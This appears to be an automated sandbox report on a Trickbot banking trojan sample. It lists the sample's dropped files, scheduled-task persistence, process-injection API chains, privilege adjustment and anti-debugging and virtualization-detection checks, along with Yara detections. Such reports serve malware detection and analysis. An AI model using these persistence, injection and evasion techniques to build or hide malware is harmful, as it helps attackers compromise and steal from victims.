Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E3EC0	3_2_006E3EC0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F5EB0	3_2_006F5EB0

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: String function: 00404AE0 appears 55 times
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: String function: 00401690 appears 31 times
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: String function: 00405340 appears 226 times
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: String function: 00417F36 appears 31 times

PE file contains strange resources

Show sources

Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ______.exe.0.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ______.exe.2.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Sample file is different than original file name gathered from version info

Show sources

Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.254939532.01880000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.257684622.023A0000.00000008.00000001.sdmp	Binary or memory string: originalfilename vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.257684622.023A0000.00000008.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.257727095.025C0000.00000008.00000001.sdmp	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

File read: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal68.bank.troj.evad.winEXE@4/5@2/3

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\ProgramData\??????.exe	Code function: 2_2_005C5470 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,CloseHandle,OpenProcessToken,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,AdjustTokenPrivileges,CloseHandle,	2_2_005C5470
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C8CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,	2_2_005C8CD0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D2F10 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,	2_2_005D2F10
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E5470 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,CloseHandle,OpenProcessToken,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,AdjustTokenPrivileges,CloseHandle,	3_2_006E5470
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E8CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle,	3_2_006E8CD0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F2F10 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,	3_2_006F2F10

Contains functionality to check free disk space

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Code function: 0_2_0041F155 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,

0_2_0041F155

Contains functionality to enum processes or threads

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005CC440 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpW,lstrcmpW,Process32NextW,CloseHandle,lstrcmpW,

2_2_005CC440

Contains functionality to instantiate COM classes

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005C2DA0 Sleep,GetVersion,CoCreateInstance,

2_2_005C2DA0

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Code function: 0_2_004233B8 LoadResource,LockResource,GetSysColor,GetSysColor,GetSysColor,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,StretchDIBits,SelectObject,DeleteDC,ReleaseDC,

0_2_004233B8

Creates files inside the user directory

Show sources

Source: C:\ProgramData\??????.exe

File created: C:\Users\user\AppData\Roaming\HomeLan

Jump to behavior

PE file has an executable .text section and no other executable section

Show sources

Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads ini files

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe 'C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe'
Source: unknown	Process created: C:\ProgramData\??????.exe 'C:\ProgramData\??????.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HomeLan\??????.exe C:\Users\user\AppData\Roaming\HomeLan\??????.exe
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process created: C:\ProgramData\??????.exe 'C:\ProgramData\??????.exe'	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Writes ini files

Show sources

Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe

File written: C:\Users\user\AppData\Roaming\HomeLan\settings.ini

Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Code function: 0_2_0041B1EF GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,

0_2_0041B1EF

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00405340 push eax; ret	0_2_0040535E
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00405B80 push eax; ret	0_2_00405BAE
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C88E1 push esp; ret	2_2_005C88E5
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C1F50 push eax; mov dword ptr [esp], 00000103h	2_2_005C1F52
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E88E1 push esp; ret	3_2_006E88E5
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E1F50 push eax; mov dword ptr [esp], 00000103h	3_2_006E1F52

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	File created: C:\ProgramData\??????.exe			Jump to dropped file
Source: C:\ProgramData\??????.exe	File created: C:\Users\user\AppData\Roaming\HomeLan\??????.exe			Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

File created: C:\ProgramData\??????.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_004042FB IsIconic,GetWindowPlacement,GetWindowRect,	0_2_004042FB
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00411340 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,	0_2_00411340
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00420A57 GetParent,GetParent,GetParent,IsIconic,	0_2_00420A57
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00411AF0 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,	0_2_00411AF0
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00425C28 IsIconic,IsWindowVisible,	0_2_00425C28
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_0042ED76 IsWindowVisible,IsIconic,	0_2_0042ED76
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_0042AFA7 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,	0_2_0042AFA7

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	RDTSC instruction interceptor: First address: 6e8171 second address: 6e8171 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [esp+08h], eax 0x00000006 mov dword ptr [esp+0Ch], edx 0x0000000a mov eax, dword ptr [esp+08h] 0x0000000e mov dword ptr [esp+04h], 00000001h 0x00000016 lea edx, dword ptr [00000000h+eax8] 0x0000001d test edx, 000007F8h 0x00000023 je 1F81FB82h 0x00000025 add ecx, eax 0x00000027 mov eax, ecx 0x00000029 mov esp, ebp 0x0000002b pop ebp 0x0000002c ret 0x0000002d xor edx, edx 0x0000002f div ebx 0x00000031 test esi, esi 0x00000033 mov ebp, edx 0x00000035 je 1F81FABCh 0x00000037 mov ecx, dword ptr [edi+ebp4] 0x0000003a lea eax, dword ptr [esi+01h] 0x0000003d test ecx, ecx 0x0000003f jne 1F81F7B7h 0x00000041 mov esi, eax 0x00000043 call 1F823662h 0x00000048 push ebp 0x00000049 mov ebp, esp 0x0000004b and esp, FFFFFFF8h 0x0000004e sub esp, 10h 0x00000051 call dword ptr [006F9CECh] 0x00000057 jmp 1F81FA17h 0x00000059 jmp dword ptr [75761C4Ch] 0x0000005f mov ecx, dword ptr [7FFE0324h] 0x00000065 mov edx, dword ptr [7FFE0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	RDTSC instruction interceptor: First address: 6e8171 second address: 6e8171 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [esp+08h], eax 0x00000006 mov dword ptr [esp+0Ch], edx 0x0000000a mov eax, dword ptr [esp+08h] 0x0000000e mov dword ptr [esp+04h], 00000001h 0x00000016 lea edx, dword ptr [00000000h+eax*8] 0x0000001d test edx, 000007F8h 0x00000023 je 1F81F9E2h 0x00000025 add ecx, eax 0x00000027 mov eax, ecx 0x00000029 mov esp, ebp 0x0000002b pop ebp 0x0000002c ret 0x0000002d sub esi, ebx 0x0000002f xor edx, edx 0x00000031 xor ebp, ebp 0x00000033 div esi 0x00000035 mov esi, edx 0x00000037 add esi, ebx 0x00000039 test esi, esi 0x0000003b jle 1F81F701h 0x0000003d lea ebx, dword ptr [edi+esi] 0x00000040 call 1F81BC78h 0x00000045 push ebp 0x00000046 mov ebp, esp 0x00000048 and esp, FFFFFFF8h 0x0000004b sub esp, 10h 0x0000004e call dword ptr [006F9CECh] 0x00000054 jmp 1F81F9D7h 0x00000056 jmp dword ptr [75761C4Ch] 0x0000005c mov ecx, dword ptr [7FFE0324h] 0x00000062 mov edx, dword ptr [7FFE0320h] 0x00000068 mov eax, dword ptr [7FFE03

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005C8160 rdtsc

2_2_005C8160

Contains functionality to query network adapater information

Show sources

Source: C:\ProgramData\??????.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,		2_2_005D6780
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,		3_2_006F6780

Found evasive API chain checking for process token information

Show sources

Source: C:\ProgramData\??????.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_2-9757

Found large amount of non-executed APIs

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	API coverage: 2.7 %
Source: C:\ProgramData\??????.exe	API coverage: 6.3 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe TID: 3592

Thread sleep time: -36000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe

Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_0041E050 FindFirstFileA,FindClose,	0_2_0041E050
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_0041D790 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_0041D790
Source: C:\ProgramData\??????.exe	Code function: 2_2_005CD4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,	2_2_005CD4B0
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,	2_2_005D5710
Source: C:\ProgramData\??????.exe	Code function: 2_2_005CC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,	2_2_005CC7C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006ED4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose,	3_2_006ED4B0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose,	3_2_006F5710
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006EC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose,	3_2_006EC7C0

Contains functionality to query system information

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005C1FB0 GetVersionExW,GetNativeSystemInfo,GetNativeSystemInfo,GetSystemInfo,

2_2_005C1FB0

Program exit points

Show sources

Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe

API call chain: ExitProcess graph end node

graph_3-9659

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005C8160 rdtsc

2_2_005C8160

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005CC6D0 LdrLoadDll,

2_2_005CC6D0

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Code function: 0_2_0041B1EF GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,

0_2_0041B1EF

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00402D50 mov eax, dword ptr fs:[00000030h]	0_2_00402D50
Source: C:\ProgramData\??????.exe	Code function: 2_2_005C35D0 mov ecx, dword ptr fs:[00000030h]	2_2_005C35D0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E35D0 mov ecx, dword ptr fs:[00000030h]	3_2_006E35D0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005C3180 GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap,

2_2_005C3180

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00409A06 SetUnhandledExceptionFilter,	0_2_00409A06
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe	Code function: 0_2_00409A18 SetUnhandledExceptionFilter,	0_2_00409A18
Source: C:\ProgramData\??????.exe	Code function: 2_2_005D2370 GetLastError,SetLastError,GetModuleHandleW,GetLastError,RtlAddVectoredExceptionHandler,SetCurrentDirectoryW,GetTickCount,Sleep,Sleep,CreateThread,GetTickCount,Sleep,Sleep,Sleep,CoUninitialize,OleUninitialize,ExitProcess,	2_2_005D2370
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006F2370 GetLastError,SetLastError,GetModuleHandleW,GetLastError,RtlAddVectoredExceptionHandler,SetCurrentDirectoryW,GetTickCount,Sleep,Sleep,CreateThread,GetTickCount,Sleep,Sleep,Sleep,CoUninitialize,ExitProcess,	3_2_006F2370

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005C3A80 GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,

2_2_005C3A80

Language, Device and Operating System Detection:

Contains functionality to inject threads in other processes

Show sources

Source: C:\ProgramData\??????.exe	Code function: 2_2_005C1250 CreateEventW,CreateEventW,CreateEventW,CreateEventW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,ResetEvent,ResetEvent,ResetEvent,ResumeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualFreeEx,VirtualFreeEx,		2_2_005C1250
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Code function: 3_2_006E1250 CreateEventW,CreateEventW,CreateEventW,CreateEventW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,ResetEvent,ResetEvent,ResetEvent,ResumeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,VirtualFreeEx,VirtualFreeEx,		3_2_006E1250

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\ProgramData\??????.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Contains functionality to query local / system time

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005D4E70 GetSystemTimeAsFileTime,_aulldiv,

2_2_005D4E70

Contains functionality to query the account / user name

Show sources

Source: C:\ProgramData\??????.exe

Code function: 2_2_005D1960 Sleep,GetUserNameW,

2_2_005D1960

Contains functionality to query time zone information

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Code function: 0_2_0040A95E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_0040A95E

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Code function: 0_2_00432740 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

0_2_00432740

Queries the cryptographic machine GUID

Show sources

Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Remote Access Functionality:

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Simulations

Behavior and APIs

Time	Type	Description
11:33:31	API Interceptor	6x Sleep call for process: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe modified
11:33:37	API Interceptor	905x Sleep call for process: ??????.exe modified
11:33:38	Task Scheduler	Run new task: Home lan application path: C:\Users\user\AppData\Roaming\HomeLan\.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.541461598.0032A000.00000004.00000020.sdmp	JoeSecurity_Trickbot_1	Yara detected Trickbot	Joe Security
